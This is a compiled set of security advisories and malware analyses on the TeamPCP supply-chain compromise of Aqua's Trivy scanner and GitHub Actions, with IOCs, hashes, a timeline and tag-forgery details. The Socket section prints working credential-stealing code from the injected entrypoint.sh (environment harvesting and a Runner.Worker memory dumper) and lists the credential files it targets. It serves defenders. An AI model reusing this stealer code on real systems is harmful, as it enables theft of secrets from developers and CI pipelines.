Indicator | IOC | Recommended |
Network | scan.aquasecurtiy[.]org | Block |
Network | 45.148.10.212 | Block |
Secondary | plug-tab-protective-relay.trycloudflare.com | Search |
GitHub | Repository: | Search |
Compromised | trivy | Search |
ICP | tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io | Block |
Malicious Binary Hashes
*SHA-256 hashes of the malicious Trivy v0.69.4
binaries:
Hash | Platform |
887e1f5b5b50162a60bd03b66269e0ae545d0aef0583c1c5b00972152ad7e073 | FreeBSD-64bit |
f7084b0229dce605ccc5506b14acd4d954a496da4b6134a294844ca8d601970d | Linux-32bit |
822dd269ec10459572dfaaefe163dae693c344249a0161953f0d5cdd110bd2a0 | Linux-64bit |
bef7e2c5a92c4fa4af17791efc1e46311c0f304796f1172fce192f5efc40f5d7 | Linux-ARM |
e64e152afe2c722d750f10259626f357cdea40420c5eedae37969fbf13abbecf | Linux-ARM64 |
ecce7ae5ffc9f57bb70efd3ea136a2923f701334a8cd47d4fbf01a97fd22859c | Linux-PPC64LE |
d5edd791021b966fb6af0ace09319ace7b97d6642363ef27b3d5056ca654a94c | Linux-s390x |
e6310d8a003d7ac101a6b1cd39ff6c6a88ee454b767c1bdce143e04bc1113243 | macOS-64bit |
6328a34b26a63423b555a61f89a6a0525a534e9c88584c815d937910f1ddd538 | macOS-ARM64 |
0880819ef821cff918960a39c1c1aada55a5593c61c608ea9215da858a86e349 | Windows-64bit |
**SHA-256 hash of the malicious
GitHub Action payload:
18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a
— entrypoint.sh (injected into trivy-action and setup-trivy)
Compromised
GitHub Action Workflow Hashes
**The full catalog of all 75 compromised trivy-action
tags and 7 setup-trivy tags is maintained by Socket at: socket.dev/supply-chain-attacks/trivy-github-actions-compromise
setup-trivy
(7 tags):
Action | Malicious |
setup-trivy | 8afa9b9f9183b4e00c46e2b82d34047e3c177bd0 |
setup-trivy | 386c0f18ac3d7f2ed33e2d884761119f4024ff8a |
setup-trivy | 384add36b52014a0f99c0ab3a3d58bd47e53d00f |
setup-trivy | 7a4b6f31edb8db48cc22a1d41e298b38c4a6417e |
setup-trivy | 6d8d730153d6151e03549f276faca0275ed9c7b2 |
setup-trivy | 99b93c070aac11b52dfc3e41a55cbb24a331ae75 |
setup-trivy | f4436225d8a5fd1715d3c2290d8a50643e726031 |
trivy-action
(representative sample of 75 tags):
Tag | Malicious |
0.0.1 | f77738448eec70113cf711656914b61905b3bd47 |
0.16.0 | f4f1785be270ae13f36f6a8cfbf6faaae50e660a |
0.18.0 | 85cb72f1e8ee5e6e44488cd6cbdbca94722f96ed |
0.25.0 | ddb94181dcbc723d96ffc07fddd14d97e4849016 |
0.30.0 | ad623e14ebdfe82b9627811d57b9a39e283d6128 |
0.33.0 | 19851bef764b57ff95b35e66589f31949eeb229d |
0.34.0 | ab6606b76e5a054be08cab3d07da323e90e751e8 |
0.34.2 | ddb9da4475c1cef7d5389062bdfdfbdbd1394648 |
A
Note to the Broader Ecosystem
We would also like to recognize and
thank our industry partners and the broader security community for their role
in helping contain this situation. As an open source project, Trivy does not
maintain a comprehensive record of its user base. While it is widely adopted
across organizations of all sizes, there is no centralized way to notify every
user directly. In this context, the rapid response from researchers, partners,
and community members has been invaluable.
By identifying suspicious behavior,
publishing analyses, and sharing guidance across channels, the community has
helped ensure that critical information reached users quickly. We particularly
thank the research teams at Aikido Security and CrowdStrike for their rapid
technical publications, which materially accelerated response and community
awareness.
We additionally recognize the
contributions of Wiz Research(*) and Socket Security(**), whose independent
analyses provided critical technical depth to the community response. Wiz
Research published a comprehensive advisory that includes the SITF threat model
diagram, a full binary hash IOC set, and formal threat actor tracking for
TeamPCP (wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack).
Socket Security published detailed payload reverse-engineering, the complete
catalog of all 75 compromised trivy-action workflow hashes, and an ongoing
campaign tracking dashboard (socket.dev/blog/trivy-under-attack-again).
What’s
Next
This remains an active investigation,
and we are committed to continuing to share updates as more information becomes
available. As confirmed by community researchers at Aikido Security and
CrowdStrike, the threat actor has pivoted beyond the initial CI/CD compromise
and is actively weaponizing stolen credentials across the broader ecosystem.
Organizations should treat this as an ongoing campaign, not a contained
incident.
The threat actor has expanded
operations to the npm ecosystem via a self-propagating worm dubbed
“CanisterWorm,” leveraging stolen NPM publish tokens exfiltrated from
compromised CI/CD pipelines. Aikido Security documented this worm at aikido.dev/blog/teampcp-deploys-worm-npm-trivy-compromise.
The use of stolen publish tokens to propagate malware across the NPM package
registry represents a significant escalation of the campaign’s downstream
impact.
Incidents like this underscore a
broader reality in today’s threat landscape. Even widely trusted security tools
can become targets. As attackers increasingly focus on software supply chains,
transparency, rapid response, and community collaboration are essential to
minimizing impact.
✦ Trivy Compromised
(https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack)
On March 19, 2026, threat actors
injected credential-stealing malware into Aqua Security’s Trivy scanner and
related GitHub Actions. Learn how "TeamPCP" executed this breach and
how to audit your environment.
Update March 23, 17:40 UTC: Wiz Research has identified
a parallel compromise of kics-github-action
On March 19, 2026, threat actors compromised
Aqua Security's Trivy vulnerability
scanner, injecting credential-stealing malware into official releases and
GitHub Actions. While Aqua
reports they have since removed the malicious releases,
organizations using Trivy should audit their environments immediately.
Update
March 22, 13:15 UTC: Wiz Research continues to track TeamPCP activity following
the initial Trivy compromise. The threat actor has expanded operations to the
npm ecosystem via a worm ("CanisterWorm") leveraging stolen publish
tokens. Additionally, the ICP-hosted fallback C2 (tdtqy-oyaaa-aaaae-af2dq-cai)
is now actively serving an iteratively developed payload (kamikaze.sh). Aqua
has published a blog post and a GitHub Security Advisory.
Update
March 22, 21:40 UTC: ~16:00 UTC, attackers were able to publish
malicious images of Trivy (0.69.5, 0.69.6) to Docker Hub. The attacker has
also demonstrated continued access to Aqua by publishing internal Aqua
repositories publicly on GitHub. As of 21:31 UTC, the IPC Canister has been
made "Unavailable Due to Policy Violation." We continue to monitor
the situation.
Update March 23,
19:26 UTC: Aqua's blog post has been updated with additional details.
Note: this
incident is distinct from the previous instance earlier this month,
where MegaGame10418 exploited a PWN request, that was also later
flagged by hackerbot-claw. Customers can refer to the
Threat Center Advisory on the previous incident.
What
happened?
Wiz Research, in concert with other
industry parties, identified a multi-faceted supply chain attack targeting Aqua
Security's Trivy. The attack compromised multiple components of the
Trivy project: the core scanner, the trivy-action GitHub Action, and
the setup-trivy GitHub Action.
The attack was conducted with access
retained following incomplete containment of the earlier incident.
The threat actor, self-identifying
as TeamPCP, made imposter commits that were pushed
to actions/checkout (while spoofing user rauchg) and
to aquasecurity/trivy (while spoofing user DmitriyLewen). At
17:43:37 UTC, the Trivy repository’s v0.69.4 tag was pushed,
triggering a release. This resulted in a malicious checkout that fetched credential
stealer code from a typosquatted domain (scan.aquasecurtiy[.]org,
resolving to 45.148.10.212), and backdoored binaries being published to
GitHub Releases, Docker Hub, GHCR, and ECR. The maintainers have since removed
these malicious artifacts.
The attacker also compromised
the aqua-bot service account and then abused their access push
malicious workflows to tfsec, traceeshark,
and trivy-action and steal additional credentials from Aqua
(including GPG keys and credentials for Docker Hub, Twitter, and Slack). These
secrets were exfiltrated to a Cloudflare Tunnel C2
(plug-tab-protective-relay.trycloudflare.com). Furthermore, 75 out of
76 trivy-action tags were force-pushed to malicious versions,
and 7 setup-trivy tags were force-pushed as well.
The malicious versions of these
Actions run a tool self-described as "TeamPCP Cloud stealer", which
dumps Runner.Worker process memory, harvests SSH, cloud, and K8s
secrets, encrypts the data (using AES-256+RSA-4096), and exfiltrates it to a
remote server. The malware is configured to create a repository
named tpcp-docs in the victim's GitHub account as a fallback method.
What
did the malicious GitHub workflows do?
The attacker injected the same
three-stage payload into both trivy-action (in entrypoint.sh)
and setup-trivy (in action.yaml). When a downstream workflow
executed either action, the payload ran on the victim's GitHub Actions runner:
- Collection:
The malware scraped memory from the Runner.Worker process by
reading /proc//mem and searching for the
pattern {"value":"","isSecret":true}.
It also swept the filesystem for SSH keys, cloud credentials (AWS,
GCP, Azure), Kubernetes tokens, and cryptocurrency wallets across 50+
sensitive file paths. - Encryption:
Harvested credentials were encrypted using AES-256-CBC with RSA-4096
hybrid encryption and bundled into tpcp.tar.gz - Exfiltration:
The malware transmitted the encrypted bundle to a typosquatted domain
(scan.aquasecurtiy[.]org). As a fallback, it could create
a tpcp-docs repository in the victim's GitHub account and upload
the stolen credentials as a release asset.
What
did the malicious Trivy binary (v0.69.4) do?
When the malicious binary is
executed it starts both the legitimate trivy service and the malicious code in
parallel. In our initial analysis the malicious code exfiltrates secrets with a
primary and backup mechanism. If it detects it is on a developer machine it
additionally writes a base64 encoded python dropper for persistence.
Data
Theft
The malicious process gathers
environmental variables, sweeps the system for any credentials stored in the
filesystem and enumerates the network interface. It then compresses and
encrypts the data and attempts to exfiltrate it via post request to https://scan.aquasecurtiy[.]org.
If that fails (returns a non-2xx status code), the malware then attempts to use
a stolen GITHUB_TOKEN to create a repo tpcp-docs and post the data
there.
Set
Persistence
The malicious code attempts to
identify if it is on a developer machine by checking if the environmental
variable GITHUB_ACTIONS != “true”. If that check passes, the malware
attempts to create persistence by writing a python script as ~/.config/systemd/user/sysmon.py and
creating a systemd unit that persistently runs the python script.
sysmon.py initially sleeps for
five minutes and then
polls https://tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io/. If a non-youtube
link is found there the dropper downloads to /tmp/pglog and executes
it in a new session.
At the time of analysis (10:30 AM
EST/15:30 UTC) the malicious site was set to a RickRoll, but it could be
changed by the attacker at any time.
Which
actions should security teams take?
- Audit
Trivy versions: Check whether your organization pulled or executed
Trivy v0.69.4 from any source (GitHub Releases, container
registries, etc.). Remove any affected artifacts immediately. - Audit
GitHub Action references: Review workflows
using aquasecurity/trivy-action or aquasecurity/setup-trivy.
If you referenced a version tag rather than a SHA, check workflow run logs
from March 19-20 for signs of compromise. Specifically, you can look in
the Run Trivy step of trivy-action and the Setup
environment step of setup-trivy. - Search
for exfiltration artifacts: Look for repositories
named tpcp-docs in your GitHub organization, which may indicate
successful exfiltration via the fallback mechanism. Hunt based on the IOCs
provided below.
Long-term hardening: Pin
GitHub Actions to full SHA hashes, not version tags. Version tags can be moved
to point at malicious commits, as demonstrated in this attack.
How
Wiz can help?
Wiz customers should refer to and
monitor the advisory in the Wiz
Threat Center for ongoing guidance, pre-built queries, and
references to relevant detections they can use to assess the risk in
their environment.
Worried you’ve been
impacted? Connect
with the Wiz Incident Response team.
Appendix
SITF diagram
Indicators of compromise
Network Indicators
Indicator | Notes |
scan.aquasecurtiy.org | Typosquatted C2 |
45.148.10.212 | TECHOFF SRV LIMITED, Amsterdam |
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io | ICP-hosted fallback within |
plug-tab-protective-relay.trycloudflare.com | Used within GitHub Actions for |
Malicious Artifacts
Type | Value | Details |
IOC (Hash) | 887e1f5b5b50162a60bd03b66269e0ae545d0aef0583c1c5b00972152ad7e073 | FreeBSD-64bit |
IOC (Hash) | f7084b0229dce605ccc5506b14acd4d954a496da4b6134a294844ca8d601970d | Linux-32bit |
IOC (Hash) | 822dd269ec10459572dfaaefe163dae693c344249a0161953f0d5cdd110bd2a0 | Linux-64bit |
IOC (Hash) | bef7e2c5a92c4fa4af17791efc1e46311c0f304796f1172fce192f5efc40f5d7 | Linux-ARM |
IOC (Hash) | e64e152afe2c722d750f10259626f357cdea40420c5eedae37969fbf13abbecf | Linux-ARM64 (unconfirmed) |
IOC (Hash) | ecce7ae5ffc9f57bb70efd3ea136a2923f701334a8cd47d4fbf01a97fd22859c | Linux-PPC64LE |
IOC (Hash) | d5edd791021b966fb6af0ace09319ace7b97d6642363ef27b3d5056ca654a94c | Linux-s390x |
IOC (Hash) | e6310d8a003d7ac101a6b1cd39ff6c6a88ee454b767c1bdce143e04bc1113243 | macOS-64bit |
IOC (Hash) | 6328a34b26a63423b555a61f89a6a0525a534e9c88584c815d937910f1ddd538 | macOS-ARM64 |
IOC (Hash) | 0880819ef821cff918960a39c1c1aada55a5593c61c608ea9215da858a86e349 | Windows-64bit |
Malicious Workflows
Credit to Socket for compiling
this data and making it easily available at https://socket.dev/supply-chain-attacks/trivy-github-actions-compromise
Action | Hash |
setup-trivy | 8afa9b9f9183b4e00c46e2b82d34047e3c177bd0 |
setup-trivy | 386c0f18ac3d7f2ed33e2d884761119f4024ff8a |
setup-trivy | 384add36b52014a0f99c0ab3a3d58bd47e53d00f |
setup-trivy | 7a4b6f31edb8db48cc22a1d41e298b38c4a6417e |
setup-trivy | 6d8d730153d6151e03549f276faca0275ed9c7b2 |
setup-trivy | 99b93c070aac11b52dfc3e41a55cbb24a331ae75 |
setup-trivy | f4436225d8a5fd1715d3c2290d8a50643e726031 |
trivy-action | f4f1785be270ae13f36f6a8cfbf6faaae50e660a |
trivy-action | 0891663bc55073747be0eb864fbec3727840945d |
trivy-action | 2e7964d59cd24d1fd2aa4d6a5f93b7f09ea96947 |
trivy-action | ddb9da4475c1cef7d5389062bdfdfbdbd1394648 |
trivy-action | 4209dcadeaea6a7df69262fef1beeda940881d4d |
trivy-action | f5c9fd927027beaa3760d2a84daa8b00e6e5ee21 |
trivy-action | 18f01febc4c3cd70ce6b94b70e69ab866fc033f5 |
trivy-action | bb75a9059c2d5803db49e6ed6c6f7e0b367f96be |
trivy-action | d488f4388ff4aa268906e25c2144f1433a4edec2 |
trivy-action | 3c615ac0f29e743eda8863377f9776619fd2db76 |
trivy-action | a9bc513ea7989e3234b395cafb8ed5ccc3755636 |
trivy-action | 8519037888b189f13047371758f7aed2283c6b58 |
trivy-action | 8cfb9c31cc944da57458555aa398bb99336d5a1f |
trivy-action | 9092287c0339a8102f91c5a257a7e27625d9d029 |
trivy-action | 7b955a5ece1e1b085c12dac7ac10e0eb1f5b0d4d |
trivy-action | 19851bef764b57ff95b35e66589f31949eeb229d |
trivy-action | 61fbe20b7589e6b61eedcd5fe1e958e1a95fbd13 |
trivy-action | fa78e67c0df002c509bcdea88677fb5e2fe6a9b1 |
trivy-action | b7befdc106c600585d3eec87d7e98e1c136839ae |
trivy-action | 7f6f0ce52a59bdfc5757c3982aac2353b58f4c73 |
trivy-action | ddb6697447a97198bdef9bae00215059eb5e8bc2 |
trivy-action | 3dffed04dc90cf1c548f40577d642c52241ec76c |
trivy-action | ad623e14ebdfe82b9627811d57b9a39e283d6128 |
trivy-action | 848d665ed24dc1a41f6b4b7c7ffac7693d6b37be |
trivy-action | ddb94181dcbc723d96ffc07fddd14d97e4849016 |
trivy-action | b7252377a3d82c73d497bfafa3eabe84de1d02c4 |
trivy-action | fa4209b6182a4c1609ce34d40b67f5cfd7f00f53 |
trivy-action | 2b1dac84ff12ba56158b3a97e2941a587cb20da9 |
trivy-action | 66c90331c8b991e7895d37796ac712b5895dda3b |
trivy-action | fd429cf86db999572f3d9ca7c54561fdf7d388a4 |
trivy-action | 8ae5a08aec3013ee8f6132b2a9012b45002f8eaa |
trivy-action | 2a51c5c5bb1fd1f0e134c9754f1702cfa359c3dd |
trivy-action | 9c000ba9d482773cbbc2c3544d61b109bc9eb832 |
trivy-action | 91e7c2c36dcad14149d8e455b960af62a2ffb275 |
trivy-action | 4bdcc5d9ef3ddb42ccc9126e6c07faa3df2807e3 |
trivy-action | 9e8968cb83234f0de0217aa8c934a68a317ee518 |
trivy-action | c5967f85626795f647d4bf6eb67227f9b79e02f5 |
trivy-action | b745a35bad072d93a9b83080e9920ec52c6b5a27 |
trivy-action | 38623bf26706d51c45647909dcfb669825442804 |
trivy-action | 555e7ad4c895c558c7214496df1cd56d1390c516 |
trivy-action | 2297a1b967ecc05ba2285eb6af56ab4da554ecae |
trivy-action | 820428afeb64484d311211658383ce7f79d31a0a |
trivy-action | f77738448eec70113cf711656914b61905b3bd47 |
trivy-action | 252554b0e1130467f4301ba65c55a9c373508e35 |
trivy-action | 22e864e71155122e2834eb0c10d0e7e0b8f65aa3 |
trivy-action | 405e91f329294fb696f55793203abf1f6aba9b40 |
trivy-action | 506d7ff06abc509692c600b5b69b4dc6ceaa4b15 |
trivy-action | 276ca9680f6df9016db12f7c48571e5c4639451d |
trivy-action | aa3c46a9643b18125abb8aefc13219014e9c4be8 |
trivy-action | ea56cd31d82b853932d50f1144e95b21817e52cf |
trivy-action | 0d49ceb356f7d4735c63bd0d5c7e67665ec7f80c |
trivy-action | 7550f14b64c1c724035a075b36e71423719a1f30 |
trivy-action | da73ae0790e458e878b300b57ceb5f81ac573b46 |
trivy-action | 6ec7aaf336b7d2593d980908be9bc4fed6d407c6 |
trivy-action | cf19d27c8a7fb7a8bbf1e1000e9318749bcd82cf |
trivy-action | ef3a510e3f94df3ea9fcd01621155ca5f2c3bf5b |
trivy-action | 6fc874a1f9d65052d4c67a314da1dae914f1daff |
trivy-action | b9faa60f85f6f780a34b8d0faaf45b3e3966fdda |
trivy-action | ab6606b76e5a054be08cab3d07da323e90e751e8 |
trivy-action | a5b4818debf2adbaba872aaffd6a0f64a26449fa |
trivy-action | e53b0483d08da44da9dfe8a84bf2837e5163699b |
trivy-action | 8aa8af3ea1de8e968a3e49a40afb063692ab8eae |
trivy-action | 91d5e0a13afab54533a95f8019dd7530bd38a071 |
trivy-action | 794b6d99daefd5e27ecb33e12691c4026739bf98 |
trivy-action | 9ba3c3cd3b23d033cd91253a9e61a4bf59c8a670 |
trivy-action | e0198fd2b6e1679e36d32933941182d9afa82f6f |
trivy-action | 9738180dd24427b8824445dbbc23c30ffc1cb0d8 |
trivy-action | 3201ddddd69a1419c6f1511a14c5945ba3217126 |
trivy-action | 985447b035c447c1ed45f38fad7ca7a4254cb668 |
trivy-action | 3d1b5be1589a83fc98b82781c263708b2eb3b47b |
trivy-action | fd090040b5f584f4fcbe466878cb204d0735dcf4 |
trivy-action | 85cb72f1e8ee5e6e44488cd6cbdbca94722f96ed |
trivy-action | cf1692a1fc7a47120e6508309765db7e33477946 |
trivy-action | 1d74e4cf63b7cf083cf92bf5923cf037f7011c6b |
trivy-action | c19401b2f58dc6d2632cb473d44be98dd8292a93 |
Thu, Mar 19- 12:00 UTC
Imposter
Commit to actions/checkout – Github -12:00 UTC
Attacker creates a malicious commit
impersonating rauchg (Guillermo Rauch) in
the actions/checkout repository. Payload fetches malicious Go files
from typosquatted C2 and injects them into the build.
Imposter
Commit to aquasecurity/trivy- GitHub- 12:00 UTC
Attacker duplicates a prior
legitimate contribution and impersonates DmitriyLewen. This malicious
commit references the imposter checkout action, establishing the attack chain.
Malicious
v0.69.4 Tag Pushed - GitHub- 17:43:37 UTC
Tag v0.69.4 pushed to
trivy repository, pointing to the malicious commit. This triggers automated
release workflows.
Malicious
Releases Distributed - 18:22 UTC
Malicious v0.69.4 release artifacts
become publicly accessible on GitHub Releases and container registries (ECR,
Docker Hub, GHCR).
Malicious
GitHub Release Removed- 21:42 UTC
✓Malicious GitHub Release Removed Aqua removes malicious
v0.69.4 GitHub release (~3 hours exposure window)
Phase
02 – Lateral Movement
(3 events)
tfsec
Workflow Compromised - Thu, Mar 19 21:31:23 UTC
Malicious workflow added
to aquasecurity/tfsec using compromised aqua-bot identity.
Workflow dumps secrets, then is reverted.
commit
(aqua-bot)
workflow
run (SCP failed)
link expired or no longer working
traceeshark
Workflow Compromised - 21:35:34 UTC
Same attack pattern applied
to aquasecurity/traceeshark. Malicious workflow injected via compromised
bot account.
Aquabot commit
trivy-action
Workflow Compromised - 21:36:28 UTC
Attack
continues to aquasecurity/trivy-action. This repository is particularly
critical as it's used by thousands of downstream projects.
aquasecurity/trivy-action Commit 93ed411
Phase 3 Malicious Distribution
(1 event)
Thu, Mar 19- 22:08 UTC
Malicious
Action Tags Published- Socket.dev
(https://socket.dev/blog/trivy-under-attack-again-github-actions-compromise)
Update — March 22, 2026: Additional
compromised Trivy artifacts have been identified in Docker Hub. New image tags
(0.69.5 and 0.69.6), along with the previously
identified 0.69.4, were found to contain the same infostealer payload,
with latest pointing to a malicious image during the exposure window.
Read our full update on the Docker image compromise here: https://socket.dev/blog/trivy-docker-images-compromised
A new supply chain attack targeting
Trivy has been disclosed
today by Paul McCarty, marking the second distinct compromise
affecting the Trivy ecosystem in March.
This latest incident impacts GitHub
Actions, and is separate from the earlier
OpenVSX compromise involving the VS Code extension.
Initial reports have focused on the
compromise of Trivy v0.69.4, with downstream ecosystems such as Homebrew
already rolling back affected versions. The first known detection of suspicious
activity traces back to approximately 19:15 UTC.
However, early findings indicate
the scope of the attack extends beyond a single release.
At Socket, we identified that an
attacker force-pushed 75 out of 76 version tags in the
aquasecurity/trivy-action repository, the official GitHub Action for running
Trivy vulnerability scans in CI/CD pipelines. With over 10,000 workflow files
on GitHub referencing this action, the potential blast radius is significant.
These tags were modified to serve a malicious payload, effectively turning
trusted version references into a distribution mechanism for an infostealer.
These compromised tags remain active at the time of writing.
Any CI/CD pipeline referencing
aquasecurity/trivy-action by version tag, including commonly used tags such as
@0.34.2, @0.33.0, or @0.18.0, is executing malicious code before the legitimate
Trivy scan runs. This may prevent users from noticing any issues. At this time,
@0.35.0 appears to be the only unaffected version tag.
Socket independently detected this
activity in real time. Beginning at 19:15 UTC, Socket generated 182 threat feed
entries tied to malicious GitHub Actions associated with this campaign. All
were correctly classified as Backdoor, Infostealer, or Reconnaissance malware
by Socket’s AI scanner.
Screenshot of the Socket package page for of the compromised
tags of the aquasecurity/trivy-action GitHub Action, showing a "Known
Malware" alert.
The malicious payload is designed
to execute within GitHub Actions runners, targeting sensitive data in CI/CD
environments. Observed behavior includes dumping runner process memory to
extract secrets, harvesting SSH keys, and exfiltrating credentials for AWS,
GCP, and Azure, as well as Kubernetes service account tokens.
This marks the second supply chain incident involving
Trivy in March. Earlier in the month, a separate compromise affected
the Aqua Trivy VS Code extension distributed via OpenVSX, where injected code
attempted to abuse local AI coding agents.
Socket users can check whether
their workflows are affected in the dashboard under Threat Intel → Campaigns,
or view the public campaign tracker for the Trivy
GitHub Actions Compromise.
Update
3/20:
Recent updates from the Trivy
maintainers confirm that this attack was enabled by a compromised credential
with write access to the repository. The incident is a continuation of the
earlier March breach, during which credentials were exfiltrated from Trivy’s CI
environment. Although secrets and tokens were rotated in response, the rotation
process was not fully atomic, and the attacker may have retained access to
newly issued credentials. This allowed the threat actor to perform
authenticated operations, including force-updating tags, without needing to
exploit GitHub itself. While the exact credential used in this phase has not
been publicly specified, the root cause is now understood to be residual access
from the earlier credential compromise.
How the Attacker Poisoned 75 Tags Without Touching a
Branch#
The most striking aspect of this
attack is not the payload itself but the delivery mechanism. After getting
access to Trivy’s credentials, the attacker compromised
the aquasecurity/trivy-action GitHub action but not by pushing to a
branch or creating a new release, which would appear in the commit history and
trigger notifications. Instead, the attacker force-pushed 75 existing version
tags to point to new malicious commits. The technique involved multiple layers
of deception that merit close examination.
Recall that a git tag is a pointer
to a commit SHA. When a GitHub Actions workflow
references aquasecurity/[email protected], GitHub resolves that tag to
whatever commit it currently points to. If an attacker with push access
force-updates the tag to a different commit, every workflow referencing that
tag automatically begins pulling the new code.
How Each Tag Was Rewritten#
For each of the 75 tags, the
attacker created a new commit with carefully spoofed metadata:
- Started
from the master HEAD tree (57a97c7e), the current file tree
containing all latest code - Swapped entrypoint.sh with
the infostealer payload, leaving everything else from master intact - Looked
up the original commit that the tag previously pointed to
(e.g., the PR #481 merge for tag 0.33.0) - Cloned
that commit's metadata, spanning author name, email,
committer, both timestamps, and the full commit message including PR
number and "Fixes" references - Set
the parent to 57a97c7e (master HEAD) rather than
the original parent - Force-pushed
the tag to this new commit
The result is a file tree that is
identical across all 75 malicious commits, master plus the
swapped entrypoint.sh. Only the commit metadata varies per tag, spoofed to
match each tag's original commit so it appears legitimate in git log.
The GitHub release page for one of
the compromised releases, 0.33.1, showing all the expected metadata and an
"Immutable" badge. However, the tag was force-pushed to a malicious
commit on current master, as betrayed by the "0 commits to master since
this release" comment.
Only a few indicators betray the forgery:
- Each
original commit was GPG-signed by GitHub when merged via the web UI. The
attacker's commits are unsigned, because the original GitHub web-flow
signature cannot be recreated. - Each
commit claims a date from the original release (2021, 2022, etc.) but has
a parent dated March 2026. This is impossible. - The
original commits typically touched multiple files. Each malicious commit
modifies only entrypoint.sh, because the rest of the tree is master
HEAD rather than the original tag's tree.
GitHub's release UI displays an
"Immutable" badge next to each tag on the releases page of the
compromised action. Immutable releases refer to a newer
GitHub feature enforcing that release versions, once published,
cannot be altered or deleted.
The attacker might have
deliberately published immutable releases when poisoning the tags, effectively
locking in the malicious state and making it harder for maintainers to restore
the original tag targets.
As this compromise shows,
organizations and downstream users should not rely solely on the
"Immutable" indicator to verify tag integrity. GitHub's own security
guidance recommends pinning actions to full commit SHAs as the only truly
immutable way to consume an action.
On GitHub's release page, each
poisoned tag displays "0 commits to master since this release." For a
tag like 0.6.0 from 2020, this counter should show hundreds of commits. It
reads zero because the malicious commit's parent is master
HEAD; GitHub's comparison logic treats the tag as being at or ahead of master
rather than behind it. This is an easy visual indicator of compromise when
browsing the releases page.
Why Tag 0.35.0 Was Not Poisoned#
Tag 0.35.0 is the sole clean tag. It points to the
latest commit on the master branch, 57a97c7e. The attacker used this
commit as the base tree for generating all 75 malicious commits.
Tag 0.35.0 was not replaced because it already points to the base
commit. The attacker's tooling likely iterated over all tags and skipped the
one that matched the parent. Replacing it would have produced a commit whose
parent is itself, a no-op that would also risk drawing attention to the latest
release, the tag most likely to be monitored.
Payload Overview#
The
malicious entrypoint.sh is 204 lines long. Lines 4 through 105
contain the injected infostealer. Lines 106 through 204 contain the legitimate
Trivy scanning code. Because the malware executes first and the real Trivy scan
follows normally afterward, users see expected scan output and may not notice
that anything is wrong.
The
payload operates in three stages:
- Collection (lines
4–36) — Harvests secrets from runner process memory and the filesystem - Encryption (lines
39–68) — Encrypts collected data with AES-256-CBC and wraps the key with
RSA-4096 - Exfiltration (lines
70–104) — Transmits the encrypted bundle to an attacker-controlled
endpoint, with a GitHub-based fallback
Stage
1: Secret Collection#
Process Environment Scraping (Lines 4–29)#
The first block of malicious code
locates GitHub Actions runner processes and harvests their environment
variables:
Bash
_COLLECT_PIDS="$$"
for _name in Runner.Worker Runner.Listener runsvc run.sh; do
_PIDS=$(pgrep -f
"$_name" 2>/dev/null || true)
[ -n
"$_PIDS" ] && _COLLECT_PIDS="$_COLLECT_PIDS $_PIDS"
done
COLLECTED="/tmp/runner_collected_$$.txt"
: > "$COLLECTED"
for _PID in $_COLLECT_PIDS; do
_ENVIRON="/proc/${_PID}/environ"
[ -r "$_ENVIRON" ] || continue
while IFS= read -r line; do
key="${line%%=*}"
val="${line#*=}"
if echo
"$key" | grep -qiE '(env|ssh)'; then
printf
'%s=%s\
' "$key" "$val" >> "$COLLECTED"
if [ -f
"$val" ] && [ ! -S "$val" ]; then
printf
'\
[%s]\
' "$val" >> "$COLLECTED"
cat
"$val" >> "$COLLECTED"
printf '\
'
>> "$COLLECTED"
fi
fi
done < <(tr
'\\0' '\
' < "$_ENVIRON")
done
The script finds PIDs for GitHub
Actions runner processes
(Runner.Worker, Runner.Listener, runsvc, run.sh), reads
null-delimited environment variables from /proc/
filters for keys containing env or ssh. When a matching
variable's value is a file path, it reads and appends the file contents as
well, capturing SSH keys, environment files, and similar material. All
collected data is written to /tmp/runner_collected_
GitHub-Hosted
Runners: Process Memory Dump (Lines 30–32)#
On GitHub-hosted Linux runners, the
malware escalates significantly. A base64-encoded Python script is decoded and
executed with sudo:
Python
import sys, os, re
def get_pid():
for pid in (p for
p in os.listdir('/proc') if p.isdigit()):
try:
with
open(os.path.join('/proc', pid, 'cmdline'), 'rb') as f:
if
b'Runner.Worker' in f.read():
return pid
except
OSError:
continue
raise
SystemExit(0)
pid = get_pid()
map_path = f"/proc/{pid}/maps"
mem_path = f"/proc/{pid}/mem"
with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0)
as mem_f:
for line in map_f:
m =
re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)
if not m or
m.group(3) != 'r':
continue
start =
int(m.group(1), 16)
end = int(m.group(2), 16)
if start >
sys.maxsize:
continue
mem_f.seek(start)
try:
chunk =
mem_f.read(end - start)
sys.stdout.buffer.write(chunk)
except
OSError:
continue
The script locates
the Runner.Worker process by scanning /proc/*/cmdline,
parses /proc/
regions, and dumps each region from /proc/
wrapper then greps the raw memory dump for the JSON
pattern "
the internal format GitHub Actions uses to store secrets in the Runner.Worker
.NET process heap.
This technique is made reliable by
the GitHub-hosted runner's privilege model: GitHub documents
passwordless sudo on Linux and macOS hosted runners, which bypasses
ptrace restrictions and Yama LSM settings that would otherwise govern access to /proc/
The shell wrapper then greps for "isSecret":true patterns,
which can likely recover many secrets actually injected into the job and
resident in Runner.Worker memory — especially simple string values. It should
not be assumed to recover every configured secret in the repository,
organization, or environment, since GitHub Actions only injects secrets that
are actually referenced in the workflow, with further caveats for fork-based
PRs, reusable workflows, and Dependabot-triggered runs.
Self-Hosted
Runners: Filesystem Credential Stealer (Lines 34–36)#
On self-hosted runners or non-Linux
environments, a different base64-encoded Python payload executes, a
comprehensive filesystem credential harvester self-identified as ##
TeamPCP Cloud stealer in a comment on its final line. The script uses
three utility functions (emit for reading files, run for
executing commands, walk for recursive directory traversal) to
systematically search for sensitive data across the runner.
The
targeted credential categories are extensive:
Category | Targets |
Reconnaissance | hostname, whoami, uname -a, ip |
SSH | ~/.ssh/id_rsa, id_ed25519, id_ecdsa, id_dsa, authorized_keys, known_hosts, config; /etc/ssh/ssh_host_*_key |
Git | ~/.git-credentials, ~/.gitconfig |
AWS | ~/.aws/credentials, ~/.aws/config, AWS_* env |
GCP | ~/.config/gcloud/*, application_default_credentials.json, GOOGLE_APPLICATION_CREDENTIALS |
